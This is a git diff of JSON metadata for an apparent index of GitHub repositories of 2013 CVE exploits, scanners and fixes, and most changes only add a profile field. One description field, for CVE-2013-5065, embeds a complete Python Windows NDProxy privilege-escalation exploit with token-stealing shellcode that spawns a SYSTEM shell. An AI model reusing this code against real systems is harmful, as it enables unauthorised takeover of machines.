"https:\/\/github.com\/xiw1ll\/CVE-2013-2028_Checker", "description": "Tool for checking Nginx CVE-2013-2028", diff --git a/2013/CVE-2013-2072.json b/2013/CVE-2013-2072.json index 0718116747..a37e0b69eb 100644 --- a/2013/CVE-2013-2072.json +++ b/2013/CVE-2013-2072.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-2072", "description": "Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen", diff --git a/2013/CVE-2013-2094.json b/2013/CVE-2013-2094.json index 6c04e4a73b..e03ecd5823 100644 --- a/2013/CVE-2013-2094.json +++ b/2013/CVE-2013-2094.json @@ -7,7 +7,8 @@ "login": "realtalk", "id": 4284520, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4284520?v=4", - "html_url": "https:\/\/github.com\/realtalk" + "html_url": "https:\/\/github.com\/realtalk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/realtalk\/cve-2013-2094", "description": "original cve-2013-2094 exploit and a rewritten version for educational purposes", @@ -37,7 +38,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/libperf_event_exploit", "description": "CVE-2013-2094 exploit for android", @@ -67,7 +69,8 @@ "login": "Pashkela", "id": 4710642, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4710642?v=4", - "html_url": "https:\/\/github.com\/Pashkela" + "html_url": "https:\/\/github.com\/Pashkela", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pashkela\/CVE-2013-2094", "description": "CVE-2013-2094 Linux 2.6.32\/2.6.37 - 3.8.10 PERF_EVENTS local root x86\/x86_64", @@ -97,7 +100,8 @@ "login": "tarunyadav", "id": 1026941, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1026941?v=4", - "html_url": "https:\/\/github.com\/tarunyadav" + "html_url": "https:\/\/github.com\/tarunyadav", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tarunyadav\/fix-cve-2013-2094", "description": null, @@ -127,7 +131,8 @@ "login": "timhsutw", "id": 3866079, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3866079?v=4", - "html_url": "https:\/\/github.com\/timhsutw" + "html_url": "https:\/\/github.com\/timhsutw", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timhsutw\/cve-2013-2094", "description": "CVE-2013-2094 kernel exploit for i386", @@ -157,7 +162,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/CVE-2013-2094", "description": "perf_swevent_init", diff --git a/2013/CVE-2013-2165.json b/2013/CVE-2013-2165.json index be41319c68..2add0676d5 100644 --- a/2013/CVE-2013-2165.json +++ b/2013/CVE-2013-2165.json @@ -7,7 +7,8 @@ "login": "Pastea", "id": 24623933, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4", - "html_url": "https:\/\/github.com\/Pastea" + "html_url": "https:\/\/github.com\/Pastea", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pastea\/CVE-2013-2165", "description": null, diff --git a/2013/CVE-2013-2171.json b/2013/CVE-2013-2171.json index 02978574a7..e8ee1ed4a9 100644 --- a/2013/CVE-2013-2171.json +++ b/2013/CVE-2013-2171.json @@ -7,7 +7,8 @@ "login": "0xGabe", "id": 68028935, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", - "html_url": "https:\/\/github.com\/0xGabe" + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xGabe\/FreeBSD-9.0-9.1-Privilege-Escalation", "description": "CVE-2013-2171", diff --git a/2013/CVE-2013-2186.json b/2013/CVE-2013-2186.json index 24a91a2266..6a19d62bde 100644 --- a/2013/CVE-2013-2186.json +++ b/2013/CVE-2013-2186.json @@ -7,7 +7,8 @@ "login": "GrrrDog", "id": 3898942, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3898942?v=4", - "html_url": "https:\/\/github.com\/GrrrDog" + "html_url": "https:\/\/github.com\/GrrrDog", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GrrrDog\/ACEDcup", "description": "Payload generator for Java Binary Deserialization attack with Commons FileUpload (CVE-2013-2186)", @@ -37,7 +38,8 @@ "login": "sa1g0n1337", "id": 24432650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24432650?v=4", - "html_url": "https:\/\/github.com\/sa1g0n1337" + "html_url": "https:\/\/github.com\/sa1g0n1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sa1g0n1337\/Payload_CVE_2013_2186", "description": "Code generate payload for CVE-2013-2186", @@ -67,7 +69,8 @@ "login": "sa1g0n1337", "id": 24432650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24432650?v=4", - "html_url": "https:\/\/github.com\/sa1g0n1337" + "html_url": "https:\/\/github.com\/sa1g0n1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sa1g0n1337\/CVE_2013_2186", "description": "Source code for CVE-2013-2186", diff --git a/2013/CVE-2013-2217.json b/2013/CVE-2013-2217.json index 3c838f6daa..2688662f75 100644 --- a/2013/CVE-2013-2217.json +++ b/2013/CVE-2013-2217.json @@ -7,7 +7,8 @@ "login": "Osirium", "id": 475594, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/475594?v=4", - "html_url": "https:\/\/github.com\/Osirium" + "html_url": "https:\/\/github.com\/Osirium", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Osirium\/suds", "description": " Clone of suds 0.4 + suds-0.4-CVE-2013-2217.patch", diff --git a/2013/CVE-2013-225.json b/2013/CVE-2013-225.json index 941fa721ca..576a31279a 100644 --- a/2013/CVE-2013-225.json +++ b/2013/CVE-2013-225.json @@ -7,7 +7,8 @@ "login": "PentestinGxRoot", "id": 22859215, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22859215?v=4", - "html_url": "https:\/\/github.com\/PentestinGxRoot" + "html_url": "https:\/\/github.com\/PentestinGxRoot", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/PentestinGxRoot\/ShellEvil", "description": "Struts 2 DefaultActionMapper Interactive Shell Exploit for CVE-2013-225 [S2-016]", diff --git a/2013/CVE-2013-2251.json b/2013/CVE-2013-2251.json index ff08481d70..c53aaac4ec 100644 --- a/2013/CVE-2013-2251.json +++ b/2013/CVE-2013-2251.json @@ -7,7 +7,8 @@ "login": "nth347", "id": 20441996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", - "html_url": "https:\/\/github.com\/nth347" + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nth347\/CVE-2013-2251", "description": "Vulnerable environment of CVE-2013-2251 (S2-016) for testing", diff --git a/2013/CVE-2013-2595.json b/2013/CVE-2013-2595.json index 67d4aa843a..b757961c1a 100644 --- a/2013/CVE-2013-2595.json +++ b/2013/CVE-2013-2595.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libmsm_cameraconfig_exploit", "description": "CVE-2013-2595 exploit", diff --git a/2013/CVE-2013-2596.json b/2013/CVE-2013-2596.json index da9c9cd3a1..dfd8565f63 100644 --- a/2013/CVE-2013-2596.json +++ b/2013/CVE-2013-2596.json @@ -7,7 +7,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/libfb_mem_exploit", "description": "CVE-2013-2596 exploit for android", diff --git a/2013/CVE-2013-2597.json b/2013/CVE-2013-2597.json index d9f18afa35..79fd256b22 100644 --- a/2013/CVE-2013-2597.json +++ b/2013/CVE-2013-2597.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libmsm_acdb_exploit", "description": "CVE-2013-2597 exploit", diff --git a/2013/CVE-2013-2729.json b/2013/CVE-2013-2729.json index 03e1e46161..a89b706e72 100644 --- a/2013/CVE-2013-2729.json +++ b/2013/CVE-2013-2729.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2013-2729", "description": null, diff --git a/2013/CVE-2013-2730.json b/2013/CVE-2013-2730.json index 7b4e3e0fc6..edc3e7062a 100644 --- a/2013/CVE-2013-2730.json +++ b/2013/CVE-2013-2730.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2013-2730", "description": null, diff --git a/2013/CVE-2013-2842.json b/2013/CVE-2013-2842.json index e0e0b65699..efc742a2ef 100644 --- a/2013/CVE-2013-2842.json +++ b/2013/CVE-2013-2842.json @@ -7,7 +7,8 @@ "login": "173210", "id": 1689097, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1689097?v=4", - "html_url": "https:\/\/github.com\/173210" + "html_url": "https:\/\/github.com\/173210", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/173210\/spider", "description": "Spider Exploit with CVE-2013-2842", diff --git a/2013/CVE-2013-2977.json b/2013/CVE-2013-2977.json index c6c8a01882..62ce979faf 100644 --- a/2013/CVE-2013-2977.json +++ b/2013/CVE-2013-2977.json @@ -7,7 +7,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-2977", "description": "IBM Lotus Notes PNG Integer Overflow", diff --git a/2013/CVE-2013-3214.json b/2013/CVE-2013-3214.json index 91a93878e6..7610e63cb2 100644 --- a/2013/CVE-2013-3214.json +++ b/2013/CVE-2013-3214.json @@ -7,7 +7,8 @@ "login": "shadofren", "id": 8515519, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8515519?v=4", - "html_url": "https:\/\/github.com\/shadofren" + "html_url": "https:\/\/github.com\/shadofren", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shadofren\/CVE-2013-3214", "description": "CVE-2013-3214", diff --git a/2013/CVE-2013-3319.json b/2013/CVE-2013-3319.json index 7219c7ec93..fef8a9430f 100644 --- a/2013/CVE-2013-3319.json +++ b/2013/CVE-2013-3319.json @@ -7,7 +7,8 @@ "login": "devoteam-cybertrust", "id": 4949243, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4949243?v=4", - "html_url": "https:\/\/github.com\/devoteam-cybertrust" + "html_url": "https:\/\/github.com\/devoteam-cybertrust", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/devoteam-cybertrust\/cve-2013-3319", "description": "metasploit module for CVE-2013-3319 \/ SAP Security Note 1816536", diff --git a/2013/CVE-2013-3651.json b/2013/CVE-2013-3651.json index b6a32e3740..687a77ec38 100644 --- a/2013/CVE-2013-3651.json +++ b/2013/CVE-2013-3651.json @@ -7,7 +7,8 @@ "login": "motikan2010", "id": 3177297, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", - "html_url": "https:\/\/github.com\/motikan2010" + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/motikan2010\/CVE-2013-3651", "description": "CVE-2013-3651 PoC - EC-CUBE 2", diff --git a/2013/CVE-2013-3660.json b/2013/CVE-2013-3660.json index c275700059..5675e354f2 100644 --- a/2013/CVE-2013-3660.json +++ b/2013/CVE-2013-3660.json @@ -7,7 +7,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2013-3660-x64-WIN7", "description": "CVE-2013-3660的x64 win7平台EXP源代码,成功率100%。", diff --git a/2013/CVE-2013-3664.json b/2013/CVE-2013-3664.json index 95bf846f1c..6569d02ff6 100644 --- a/2013/CVE-2013-3664.json +++ b/2013/CVE-2013-3664.json @@ -7,7 +7,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-3664_MAC", "description": "Sketchup MAC Pict Material Palette Stack Corruption", @@ -37,7 +38,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-3664_BMP", "description": "Sketchup BMP Material RLE4 Heap Overflow", diff --git a/2013/CVE-2013-3900.json b/2013/CVE-2013-3900.json index 53ef72ad0a..afd50119ea 100644 --- a/2013/CVE-2013-3900.json +++ b/2013/CVE-2013-3900.json @@ -7,7 +7,8 @@ "login": "snoopopsec", "id": 92749864, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92749864?v=4", - "html_url": "https:\/\/github.com\/snoopopsec" + "html_url": "https:\/\/github.com\/snoopopsec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/snoopopsec\/vulnerability-CVE-2013-3900", "description": "Remediation for CVE-2013-3900", @@ -37,7 +38,8 @@ "login": "CyberCondor", "id": 116996274, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116996274?v=4", - "html_url": "https:\/\/github.com\/CyberCondor" + "html_url": "https:\/\/github.com\/CyberCondor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CyberCondor\/Fix-WinVerifyTrustSignatureValidationVuln", "description": "Fix WinVerifyTrust Signature Validation Vulnerability, CVE-2013-3900, QID-378332", @@ -67,7 +69,8 @@ "login": "Securenetology", "id": 89155495, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89155495?v=4", - "html_url": "https:\/\/github.com\/Securenetology" + "html_url": "https:\/\/github.com\/Securenetology", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Securenetology\/CVE-2013-3900", "description": null, @@ -97,7 +100,8 @@ "login": "OtisSymbos", "id": 78093502, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78093502?v=4", - "html_url": "https:\/\/github.com\/OtisSymbos" + "html_url": "https:\/\/github.com\/OtisSymbos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OtisSymbos\/CVE-2013-3900-WinTrustVerify", "description": "Powershell script that checks for cert padding in the Windows Registry and adds it if it does not exist. Meant to resolve the WinTrustVerify Vulnerability.", diff --git a/2013/CVE-2013-4002.json b/2013/CVE-2013-4002.json index fc323644f5..e2bd5f51a1 100644 --- a/2013/CVE-2013-4002.json +++ b/2013/CVE-2013-4002.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2013-4002", "description": null, diff --git a/2013/CVE-2013-4175.json b/2013/CVE-2013-4175.json index 7477b4e28a..d3e121343b 100644 --- a/2013/CVE-2013-4175.json +++ b/2013/CVE-2013-4175.json @@ -7,7 +7,8 @@ "login": "hartwork", "id": 1577132, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1577132?v=4", - "html_url": "https:\/\/github.com\/hartwork" + "html_url": "https:\/\/github.com\/hartwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hartwork\/mysecureshell-issues", "description": " :unlock: CVE-2013-4175 -- Local denial of service demo (C)", diff --git a/2013/CVE-2013-4348.json b/2013/CVE-2013-4348.json index 549c244b92..67cbf17acd 100644 --- a/2013/CVE-2013-4348.json +++ b/2013/CVE-2013-4348.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-4348", "description": "DOS (infinite loop) attack via a small value in the IHL field of a packet with IPIP encapsulation", diff --git a/2013/CVE-2013-4362.json b/2013/CVE-2013-4362.json index a28555cf5f..ce7b610223 100644 --- a/2013/CVE-2013-4362.json +++ b/2013/CVE-2013-4362.json @@ -7,7 +7,8 @@ "login": "notclement", "id": 19283318, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19283318?v=4", - "html_url": "https:\/\/github.com\/notclement" + "html_url": "https:\/\/github.com\/notclement", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/notclement\/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation", "description": "Automatically exploit systems with vulnerable davfs2 (CVE-2013-4362)", diff --git a/2013/CVE-2013-4378.json b/2013/CVE-2013-4378.json index 01eecd1b99..c8aa2367a7 100644 --- a/2013/CVE-2013-4378.json +++ b/2013/CVE-2013-4378.json @@ -7,7 +7,8 @@ "login": "theratpack", "id": 5540319, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5540319?v=4", - "html_url": "https:\/\/github.com\/theratpack" + "html_url": "https:\/\/github.com\/theratpack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/theratpack\/grails-javamelody-sample-app", "description": " Grails sample application using the Javamelody 1.44 plugin to illustrate the CVE-2013-4378 vulnerability.", @@ -37,7 +38,8 @@ "login": "epicosy", "id": 30272775, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", - "html_url": "https:\/\/github.com\/epicosy" + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/epicosy\/VUL4J-50", "description": "javamelody\/javamelody with CVE-2013-4378", diff --git a/2013/CVE-2013-4434.json b/2013/CVE-2013-4434.json index 8cf6c757a5..404f320b48 100644 --- a/2013/CVE-2013-4434.json +++ b/2013/CVE-2013-4434.json @@ -7,7 +7,8 @@ "login": "styx00", "id": 17887949, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17887949?v=4", - "html_url": "https:\/\/github.com\/styx00" + "html_url": "https:\/\/github.com\/styx00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/styx00\/Dropbear_CVE-2013-4434", "description": "Dropbear user enumeration (CVE-2013-4434) PoC", diff --git a/2013/CVE-2013-4547.json b/2013/CVE-2013-4547.json index f2bbd8f2d8..7827a24d8c 100644 --- a/2013/CVE-2013-4547.json +++ b/2013/CVE-2013-4547.json @@ -7,7 +7,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Nginx-CVE-2013-4547", "description": null, diff --git a/2013/CVE-2013-4710.json b/2013/CVE-2013-4710.json index b5b58a9673..95ac28164c 100644 --- a/2013/CVE-2013-4710.json +++ b/2013/CVE-2013-4710.json @@ -7,7 +7,8 @@ "login": "Snip3R69", "id": 76834257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76834257?v=4", - "html_url": "https:\/\/github.com\/Snip3R69" + "html_url": "https:\/\/github.com\/Snip3R69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Snip3R69\/CVE-2013-4710-WebView-RCE-Vulnerability", "description": "Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.", diff --git a/2013/CVE-2013-4730.json b/2013/CVE-2013-4730.json index 77a0dbf6c9..50af273a33 100644 --- a/2013/CVE-2013-4730.json +++ b/2013/CVE-2013-4730.json @@ -7,7 +7,8 @@ "login": "t0rt3ll1n0", "id": 67228133, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67228133?v=4", - "html_url": "https:\/\/github.com\/t0rt3ll1n0" + "html_url": "https:\/\/github.com\/t0rt3ll1n0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/t0rt3ll1n0\/PCmanBoF", "description": "A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server", diff --git a/2013/CVE-2013-4784.json b/2013/CVE-2013-4784.json index 3fd7dfae98..a665a5bd34 100644 --- a/2013/CVE-2013-4784.json +++ b/2013/CVE-2013-4784.json @@ -7,7 +7,8 @@ "login": "alexoslabs", "id": 2213391, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2213391?v=4", - "html_url": "https:\/\/github.com\/alexoslabs" + "html_url": "https:\/\/github.com\/alexoslabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alexoslabs\/ipmitest", "description": "Shell script for testing the IPMI cipher type zero authentication bypass vulnerability (CVE-2013-4784)", diff --git a/2013/CVE-2013-4786.json b/2013/CVE-2013-4786.json index 026e03e725..bfcc9a10c1 100644 --- a/2013/CVE-2013-4786.json +++ b/2013/CVE-2013-4786.json @@ -7,7 +7,8 @@ "login": "fin3ss3g0d", "id": 62859381, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", - "html_url": "https:\/\/github.com\/fin3ss3g0d" + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fin3ss3g0d\/CosmicRakp", "description": "CVE-2013-4786 Go exploitation tool", diff --git a/2013/CVE-2013-5065.json b/2013/CVE-2013-5065.json index 01f2c0bc46..b0c54caa15 100644 --- a/2013/CVE-2013-5065.json +++ b/2013/CVE-2013-5065.json @@ -7,7 +7,8 @@ "login": "Friarfukd", "id": 6127925, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6127925?v=4", - "html_url": "https:\/\/github.com\/Friarfukd" + "html_url": "https:\/\/github.com\/Friarfukd", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Friarfukd\/RobbinHood", "description": "# NDPROXY Local SYSTEM privilege escalation # http:\/\/www.offensive-security.com # Tested on Windows XP SP3 # http:\/\/www.offensive-security.com\/vulndev\/ndproxy-local-system-exploit-cve-2013-5065\/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     \"\"\"[-] Format GetLastError\"\"\"     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log(\"[-] Unknown Error\")   print \"[*] Microsoft Windows NDProxy CVE-2013-5065 0day\" print \"[*] Vulnerability found in the wild\" print \"[*] Coded by Offensive Security\"                 tmp = (\"\\x00\"*4)*5 + \"\\x25\\x01\\x03\\x07\" + \"\\x00\"*4 + \"\\x34\\x00\\x00\\x00\" + \"\\x00\"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print \"[+] Something went wrong while allocating the null paged memory: %s\" % dwStatus     getLastError() written = c_ulong() sh = \"\\x90\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x44\\x8B\\xC8\\x8B\\x80\\x88\\x00\\x00\\x00\\x2D\\x88\\x00\\x00\\x00\\x83\\xB8\\x84\\x00\\x00\\x00\\x04\\x75\\xEC\\x8B\\x90\\xC8\\x00\\x00\\x00\\x89\\x91\\xC8\\x00\\x00\\x00\\xC3\" sc = \"\\x90\"*0x38 + \"\\x3c\\x00\\x00\\x00\" + \"\\x90\"*4 + sh + \"\\xcc\"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print \"[+] Something went wrong while writing our junk to the null paged memory: %s\" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = \"\\\\\\\\.\\\\NDProxy\" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print \"[-] Couldn't open the device... :(\"     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print \"[+] Spawning SYSTEM Shell...\" os.system(\"start \/d \\\"C:\\\\windows\\\\system32\\\" cmd.exe\")", diff --git a/2013/CVE-2013-5211.json b/2013/CVE-2013-5211.json index ce1d3725c7..6cb83d3fd3 100644 --- a/2013/CVE-2013-5211.json +++ b/2013/CVE-2013-5211.json @@ -7,7 +7,8 @@ "login": "dani87", "id": 4827873, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4827873?v=4", - "html_url": "https:\/\/github.com\/dani87" + "html_url": "https:\/\/github.com\/dani87", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dani87\/ntpscanner", "description": "Scans NTP servers for CVE-2013-5211 NTP DDOS amplification vulnerability.", @@ -37,7 +38,8 @@ "login": "suedadam", "id": 3879307, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3879307?v=4", - "html_url": "https:\/\/github.com\/suedadam" + "html_url": "https:\/\/github.com\/suedadam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/suedadam\/ntpscanner", "description": "NTP monlist scanner CVE-2013-5211", @@ -67,7 +69,8 @@ "login": "sepehrdaddev", "id": 26747519, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26747519?v=4", - "html_url": "https:\/\/github.com\/sepehrdaddev" + "html_url": "https:\/\/github.com\/sepehrdaddev", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sepehrdaddev\/ntpdos", "description": "PoC for distributed NTP reflection DoS (CVE-2013-5211)", @@ -107,7 +110,8 @@ "login": "0xhav0c", "id": 96983443, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96983443?v=4", - "html_url": "https:\/\/github.com\/0xhav0c" + "html_url": "https:\/\/github.com\/0xhav0c", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xhav0c\/CVE-2013-5211", "description": null, @@ -137,7 +141,8 @@ "login": "requiempentest", "id": 180197370, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180197370?v=4", - "html_url": "https:\/\/github.com\/requiempentest" + "html_url": "https:\/\/github.com\/requiempentest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/requiempentest\/-exploit-check-CVE-2013-5211", "description": "check and exploit for NTP vuln CVE-2013-5211", @@ -167,7 +172,8 @@ "login": "requiempentest", "id": 180197370, "avatar_url": 